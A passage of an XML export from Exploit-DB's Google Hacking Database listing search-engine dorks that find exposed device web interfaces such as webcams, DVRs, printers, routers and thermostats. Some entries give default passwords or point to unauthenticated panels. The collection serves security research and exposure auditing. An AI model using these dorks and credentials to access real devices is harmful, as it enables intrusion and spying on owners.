<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Spam Firewall&quot; inurl:&quot;8000/cgi-bin/index.cgi&quot;</shortDescription>
<textualDescription>The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization.</textualDescription>
<query>intitle:&quot;Spam Firewall&quot; inurl:&quot;8000/cgi-bin/index.cgi&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22Spam+Firewall%22+inurl%3A%228000%2Fcgi-bin%2Findex.cgi%22</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7386</id>
<link>https://www.exploit-db.com/ghdb/7386</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SPC4300&quot; &quot;ID&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SPC4300&quot; &quot;ID&quot;
# Various Online Devices
# Date: 06/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;SPC4300&quot; &quot;ID&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SPC4300&quot; &quot;ID&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>803</id>
<link>https://www.exploit-db.com/ghdb/803</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SpeedStream * Management Interface&quot;</shortDescription>
<textualDescription>a lot of Speed stream routers :)</textualDescription>
<query>intitle:&quot;SpeedStream * Management Interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22SpeedStream+*+Management+Interface%22</querystring>
<edb></edb>
<date>2005-01-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5003</id>
<link>https://www.exploit-db.com/ghdb/5003</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SQLiteManager&quot; + intext:&quot;Welcome to SQLiteManager version &quot;</shortDescription>
<textualDescription>intitle:&quot;SQLiteManager&quot; + intext:&quot;Welcome to SQLiteManager version &quot;
SQLite Manager panel
ManhNho
</textualDescription>
<query>intitle:&quot;SQLiteManager&quot; + intext:&quot;Welcome to SQLiteManager version &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SQLiteManager&quot; + intext:&quot;Welcome to SQLiteManager version &quot;</querystring>
<edb></edb>
<date>2018-10-31</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4642</id>
<link>https://www.exploit-db.com/ghdb/4642</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Status &amp; Control&quot; + &quot;Thermostat Status&quot; +&quot;HVAC Settings&quot; +&quot;Zone Temperature&quot;</shortDescription>
<textualDescription>The dork gives output as a list of smart (Network/NT) thermostats.
Without authentication, a viewer can get information like Zone Temperature and other thermostat settings.
Ankit Anubhav, NewSky Security</textualDescription>
<query>intitle:&quot;Status &amp; Control&quot; + &quot;Thermostat Status&quot; +&quot;HVAC Settings&quot; +&quot;Zone Temperature&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Status &amp; Control&quot; + &quot;Thermostat Status&quot; +&quot;HVAC Settings&quot; +&quot;Zone Temperature&quot;</querystring>
<edb></edb>
<date>2017-12-22</date>
<author>Ankit Anubhav</author>
</entry>
<entry>
<id>1395</id>
<link>https://www.exploit-db.com/ghdb/1395</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;stingray fts login&quot; | ( login.jsp intitle:StingRay )</shortDescription>
<textualDescription>The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now.</textualDescription>
<query>intitle:&quot;stingray fts login&quot; | ( login.jsp intitle:StingRay )</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=intitle%3A%22stingray+fts+login%22+%7C+%28+login.jsp+intitle%3AStingRay+%29</querystring>
<edb></edb>
<date>2006-06-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4340</id>
<link>https://www.exploit-db.com/ghdb/4340</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;StrongLoop API Explorer&quot; intext:&quot;Token Not Set&quot;</shortDescription>
<textualDescription>Look for open Strongloops loopback API Explorer.</textualDescription>
<query>intitle:&quot;StrongLoop API Explorer&quot; intext:&quot;Token Not Set&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;StrongLoop API Explorer&quot; intext:&quot;Token Not Set&quot;</querystring>
<edb></edb>
<date>2016-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1196</id>
<link>https://www.exploit-db.com/ghdb/1196</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Summit Management Interface&quot; -georgewbush.org.uk</shortDescription>
<textualDescription>Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10</textualDescription>
<query>intitle:&quot;Summit Management Interface&quot; -georgewbush.org.uk</query>
<querystring>https://www.google.com/search?q=intitle:%22Summit+Management+Interface%22+-georgewbush.org.uk&amp;num=50&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>871</id>
<link>https://www.exploit-db.com/ghdb/871</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;supervisioncam protocol&quot;</shortDescription>
<textualDescription>&quot;SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected.&quot;</textualDescription>
<query>intitle:&quot;supervisioncam protocol&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22supervisioncam+protocol%22</querystring>
<edb></edb>
<date>2005-02-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>6960</id>
<link>https://www.exploit-db.com/ghdb/6960</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;supra IPC&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;supra IPC&quot;</textualDescription>
<query>intitle:&quot;supra IPC&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;supra IPC&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5014</id>
<link>https://www.exploit-db.com/ghdb/5014</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Swagger UI - &quot; + &quot;Show/Hide&quot;</shortDescription>
<textualDescription>swagger APIs link
ManhNho
</textualDescription>
<query>intitle:&quot;Swagger UI - &quot; + &quot;Show/Hide&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Swagger UI - &quot; + &quot;Show/Hide&quot;</querystring>
<edb></edb>
<date>2018-11-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>539</id>
<link>https://www.exploit-db.com/ghdb/539</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;switch home page&quot; &quot;cisco systems&quot; &quot;Telnet - to&quot;</shortDescription>
<textualDescription>Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it.</textualDescription>
<query>intitle:&quot;switch home page&quot; &quot;cisco systems&quot; &quot;Telnet - to&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22switch+home+page%22+%22cisco+systems%22+%22Telnet+-+to%22</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>862</id>
<link>https://www.exploit-db.com/ghdb/862</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;switch login&quot; &quot;IBM Fast Ethernet Desktop&quot;</shortDescription>
<textualDescription>IBM 8275 Model 416 High Performance Ethernet Workgroup Switch</textualDescription>
<query>intitle:&quot;switch login&quot; &quot;IBM Fast Ethernet Desktop&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=intitle%3A%22switch+login%22+%22IBM+Fast+Ethernet+Desktop%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>972</id>
<link>https://www.exploit-db.com/ghdb/972</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SWW link&quot; &quot;Please wait.....&quot;</shortDescription>
<textualDescription>Zyxel Zywall</textualDescription>
<query>intitle:&quot;SWW link&quot; &quot;Please wait.....&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22SWW+link%22+%22Please+wait.....%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4218</id>
<link>https://www.exploit-db.com/ghdb/4218</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SyncThru Web Service&quot; inurl:&quot;sws&quot;</shortDescription>
<textualDescription>Description: Samsung printer web panel
Google search: intitle:&quot;SyncThru Web Service&quot; inurl:&quot;sws&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;SyncThru Web Service&quot; inurl:&quot;sws&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SyncThru Web Service&quot; inurl:&quot;sws&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6870</id>
<link>https://www.exploit-db.com/ghdb/6870</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Sys Name&quot; System Summary Sensors</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Sys Name&quot; System Summary Sensors
# Various online devices.
# Date: 08/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Sys Name&quot; System Summary Sensors</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sys Name&quot; System Summary Sensors</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1035</id>
<link>https://www.exploit-db.com/ghdb/1035</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;TANDBERG&quot; &quot;This page requires a frame capable browser!&quot;</shortDescription>
<textualDescription>Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.</textualDescription>
<query>intitle:&quot;TANDBERG&quot; &quot;This page requires a frame capable browser!&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22TANDBERG%22+%22This+page+requires+a+frame+capable+browser!%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>513</id>
<link>https://www.exploit-db.com/ghdb/513</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;The AXIS 200 Home Page&quot;</shortDescription>
<textualDescription>The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings.</textualDescription>
<query>intitle:&quot;The AXIS 200 Home Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22The+AXIS+200+Home+Page%22</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>612</id>
<link>https://www.exploit-db.com/ghdb/612</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;toshiba network camera - User Login&quot;</shortDescription>
<textualDescription>Web interface of Toshiba network cameras.</textualDescription>
<query>intitle:&quot;toshiba network camera - User Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22toshiba+network+camera+-+User+Login%22&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-10-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6811</id>
<link>https://www.exploit-db.com/ghdb/6811</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Total Web Solutions&quot; + &quot;Meter Name&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Total Web Solutions&quot; + &quot;Meter Name&quot;
# Various online devices (Power Monitoring Meter/Software).
# Date: 01/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Total Web Solutions&quot; + &quot;Meter Name&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Total Web Solutions&quot; + &quot;Meter Name&quot;</querystring>
<edb></edb>
<date>2021-03-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3873</id>
<link>https://www.exploit-db.com/ghdb/3873</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Transponder/EOL Configuration:&quot; inurl:asp</shortDescription>
<textualDescription>#Summary: Cheeta Technologies Transponder Configuration Portal (*
http://www.cheetahtech.com).*
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;Transponder/EOL Configuration:&quot; inurl:asp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Transponder/EOL Configuration:&quot; inurl:asp</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4234</id>
<link>https://www.exploit-db.com/ghdb/4234</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;TRENDnet&quot; (inurl:&quot;top.htm&quot;| inurl:&quot;STSSYS.HTM&quot;| inurl:&quot;AVIEW.HTM&quot;| inurl:&quot;JPlug.htm&quot; | inurl:&quot;JVIEW.HTM&quot;)</shortDescription>
<textualDescription>Description: TRENDnet IP camera
Google search: intitle:&quot;TRENDnet&quot; (inurl:&quot;top.htm&quot;|
inurl:&quot;STSSYS.HTM&quot;| inurl:&quot;AVIEW.HTM&quot;| inurl:&quot;JPlug.htm&quot; |
inurl:&quot;JVIEW.HTM&quot;)
Author: nebo_oben</textualDescription>
<query>intitle:&quot;TRENDnet&quot; (inurl:&quot;top.htm&quot;| inurl:&quot;STSSYS.HTM&quot;| inurl:&quot;AVIEW.HTM&quot;| inurl:&quot;JPlug.htm&quot; | inurl:&quot;JVIEW.HTM&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TRENDnet&quot; (inurl:&quot;top.htm&quot;| inurl:&quot;STSSYS.HTM&quot;| inurl:&quot;AVIEW.HTM&quot;| inurl:&quot;JPlug.htm&quot; | inurl:&quot;JVIEW.HTM&quot;)</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6486</id>
<link>https://www.exploit-db.com/ghdb/6486</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Tuxedo Connected Controller&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Tuxedo Connected Controller&quot;
# Web based home automation control pages.
# Date: 20/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Tuxedo Connected Controller&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Tuxedo Connected Controller&quot;</querystring>
<edb></edb>
<date>2020-08-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4564</id>
<link>https://www.exploit-db.com/ghdb/4564</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;twonky server&quot; inurl:&quot;9000&quot; -intext:&quot;9000&quot;</shortDescription>
<textualDescription>Finds Twonky media-sharing servers
Dxtroyer</textualDescription>
<query>intitle:&quot;twonky server&quot; inurl:&quot;9000&quot; -intext:&quot;9000&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;twonky server&quot; inurl:&quot;9000&quot; -intext:&quot;9000&quot;</querystring>
<edb></edb>
<date>2017-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4875</id>
<link>https://www.exploit-db.com/ghdb/4875</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;UltraDNS Client Redirection Service&quot;</shortDescription>
<textualDescription>intitle:&quot;UltraDNS Client Redirection Service&quot;
UltraDNS client
ManhNho
</textualDescription>
<query>intitle:&quot;UltraDNS Client Redirection Service&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;UltraDNS Client Redirection Service&quot;</querystring>
<edb></edb>
<date>2018-06-26</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6468</id>
<link>https://www.exploit-db.com/ghdb/6468</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;UPS Status&quot; &quot;Status&quot; inurl:/host</shortDescription>
<textualDescription># Google Dork: intitle:&quot;UPS Status&quot; &quot;Status&quot; inurl:/host
# Various online devices (UPS Devices).
# Date: 06/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;UPS Status&quot; &quot;Status&quot; inurl:/host</query>
<querystring>https://www.google.com/search?q=intitle:&quot;UPS Status&quot; &quot;Status&quot; inurl:/host</querystring>
<edb></edb>
<date>2020-08-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>756</id>
<link>https://www.exploit-db.com/ghdb/756</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;V-Gear BEE&quot;</shortDescription>
<textualDescription>V-Gear Bee Web Cameras</textualDescription>
<query>intitle:&quot;V-Gear BEE&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22V-Gear+BEE%22</querystring>
<edb></edb>
<date>2004-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1049</id>
<link>https://www.exploit-db.com/ghdb/1049</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;V1&quot; &quot;welcome to phone settings&quot; password</shortDescription>
<textualDescription>This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321.</textualDescription>
<query>intitle:&quot;V1&quot; &quot;welcome to phone settings&quot; password</query>
<querystring>https://www.google.com/search?q=intitle:%22V1%22+%22welcome+to+phone+settings%22+password&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5048</id>
<link>https://www.exploit-db.com/ghdb/5048</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;VB Viewer&quot;</shortDescription>
<textualDescription>This search finds several more webcams or IPCams
intitle:&quot;VB Viewer&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;VB Viewer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;VB Viewer&quot;</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>1037</id>
<link>https://www.exploit-db.com/ghdb/1037</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Veo Observer Web Client&quot;</shortDescription>
<textualDescription>Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append &quot;LGI_en.htm&quot; to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that.</textualDescription>
<query>intitle:&quot;Veo Observer Web Client&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22Veo+Observer+Web+Client%22</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>1373</id>
<link>https://www.exploit-db.com/ghdb/1373</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Veo Observer XT&quot; -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer</shortDescription>
<textualDescription>just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=1348</textualDescription>
<query>intitle:&quot;Veo Observer XT&quot; -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Veo+Observer+XT%22+-inurl%3Ashtml%7Cpl%7Cphp%7Chtm%7Casp%7Caspx%7Cpdf%7Ccfm+-intext%3Aobserver&amp;num=100</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5020</id>
<link>https://www.exploit-db.com/ghdb/5020</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;VertrigoServ&quot; + &quot;Welcome to VertrigoServ&quot;</shortDescription>
<textualDescription>unauthenticated WAMP - admin panel
ManhNho
</textualDescription>
<query>intitle:&quot;VertrigoServ&quot; + &quot;Welcome to VertrigoServ&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;VertrigoServ&quot; + &quot;Welcome to VertrigoServ&quot;</querystring>
<edb></edb>
<date>2018-11-08</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5437</id>
<link>https://www.exploit-db.com/ghdb/5437</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;VideoEdge Admin Interface&quot;</shortDescription>
<textualDescription>Various online devices
- Steve George </textualDescription>
<query>intitle:&quot;VideoEdge Admin Interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;VideoEdge Admin Interface&quot;</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Steve George</author>
</entry>
<entry>
<id>308</id>
<link>https://www.exploit-db.com/ghdb/308</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;View and Configure PhaserLink&quot;</shortDescription>
<textualDescription>These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)</textualDescription>
<query>intitle:&quot;View and Configure PhaserLink&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22View+and+Configure+PhaserLink%22</querystring>
<edb></edb>
<date>2004-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6860</id>
<link>https://www.exploit-db.com/ghdb/6860</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Vodafone Vox UI&quot; | intitle:&quot;Residential Gateway Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:intitle:&quot;Vodafone Vox UI&quot; | intitle:&quot;Residential Gateway Login&quot;
# Pages Containing Login Portals
# Date: 08/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Vodafone Vox UI&quot; | intitle:&quot;Residential Gateway Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Vodafone Vox UI&quot; | intitle:&quot;Residential Gateway Login&quot;</querystring>
<edb></edb>
<date>2021-04-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7028</id>
<link>https://www.exploit-db.com/ghdb/7028</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;vood Residential gateway&quot; inurl:vood/cgi-bin/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;vood Residential gateway&quot; inurl:vood/cgi-bin/
# Category: Various Online Devices
# Date: 09/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;vood Residential gateway&quot; inurl:vood/cgi-bin/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;vood Residential gateway&quot; inurl:vood/cgi-bin/</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>s Thakur</author>
</entry>
<entry>
<id>3871</id>
<link>https://www.exploit-db.com/ghdb/3871</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Weather Wing WS-2&quot;</shortDescription>
<textualDescription>#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.
#Category: Various Online Divices
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;Weather Wing WS-2&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Weather Wing WS-2&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6007</id>
<link>https://www.exploit-db.com/ghdb/6007</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WeatherLinkIP Configuration&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>intitle:&quot;WeatherLinkIP Configuration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WeatherLinkIP Configuration&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6947</id>
<link>https://www.exploit-db.com/ghdb/6947</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Web Client for DVR&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Web Client for DVR&quot;</textualDescription>
<query>intitle:&quot;Web Client for DVR&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Client for DVR&quot;</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>3892</id>
<link>https://www.exploit-db.com/ghdb/3892</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Web Client for EDVS&quot;</shortDescription>
<textualDescription>Yet another DVR system. Probably requires Java to display.
4N6 Security</textualDescription>
<query>intitle:&quot;Web Client for EDVS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Client for EDVS&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6903</id>
<link>https://www.exploit-db.com/ghdb/6903</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Web Client&quot; inurl:&quot;webcamera.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web Client&quot; inurl:&quot;webcamera.html&quot;
# Various Online Devices.
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Web Client&quot; inurl:&quot;webcamera.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Client&quot; inurl:&quot;webcamera.html&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>3875</id>
<link>https://www.exploit-db.com/ghdb/3875</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Web Image Monitor&quot; &amp; inurl:&quot;/mainFrame.cgi&quot;</shortDescription>
<textualDescription>#Summary: Several printers that use &quot;Web Image Monitor&quot; control panel (
http://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used default
by Ricoh, Lanier and others.
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;Web Image Monitor&quot; &amp; inurl:&quot;/mainFrame.cgi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Image Monitor&quot; &amp; inurl:&quot;/mainFrame.cgi&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7975</id>
<link>https://www.exploit-db.com/ghdb/7975</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;web server login&quot; &quot;please enter your login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;web server login&quot; &quot;please enter your login&quot;
# Category: Various Online Devices
# Date: 18/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;web server login&quot; &quot;please enter your login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;web server login&quot; &quot;please enter your login&quot;</querystring>
<edb></edb>
<date>2022-07-19</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6088</id>
<link>https://www.exploit-db.com/ghdb/6088</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WEBCAM 7 &quot; -inurl:/admin.html</shortDescription>
<textualDescription>Google Dork :
intitle:&quot;WEBCAM 7 &quot; -inurl:/admin.html
intitle:&quot;WEBCAM 7 &quot; -site:.com
Nisankh Acharjya
</textualDescription>
<query>intitle:&quot;WEBCAM 7 &quot; -inurl:/admin.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WEBCAM 7 &quot; -inurl:/admin.html</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>5091</id>
<link>https://www.exploit-db.com/ghdb/5091</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcam 7&quot; inurl:'/gallery.html'</shortDescription>
<textualDescription>Dork about webcams and ip cameras server for windows
intitle:&quot;webcam 7&quot; inurl:'/gallery.html'
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;webcam 7&quot; inurl:'/gallery.html'</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcam 7&quot; inurl:'/gallery.html'</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>6465</id>
<link>https://www.exploit-db.com/ghdb/6465</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcam&quot; inurl:login</shortDescription>
<textualDescription>My name is Aditya Rana and I would like to report this new google dork.
Description- intitle:&quot;webcam&quot; inurl:login
This dork gives various online devices login page.
Proof of concept
</textualDescription>
<query>intitle:&quot;webcam&quot; inurl:login</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcam&quot; inurl:login</querystring>
<edb></edb>
<date>2020-08-06</date>
<author>Aditya Rana</author>
</entry>
<entry>
<id>8325</id>
<link>https://www.exploit-db.com/ghdb/8325</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Webcam&quot; inurl:WebCam.htm</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Webcam&quot; inurl:WebCam.htm
# Various Online Devices
# Date: 07/11/2023
# Exploit: s Thakur</textualDescription>
<query>intitle:&quot;Webcam&quot; inurl:WebCam.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Webcam&quot; inurl:WebCam.htm</querystring>
<edb></edb>
<date>2023-11-07</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4508</id>
<link>https://www.exploit-db.com/ghdb/4508</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamXP 5&quot; -download</shortDescription>
<textualDescription>Finds WebcamXP cameras
Dxtroyer</textualDescription>
<query>intitle:&quot;webcamXP 5&quot; -download</query>
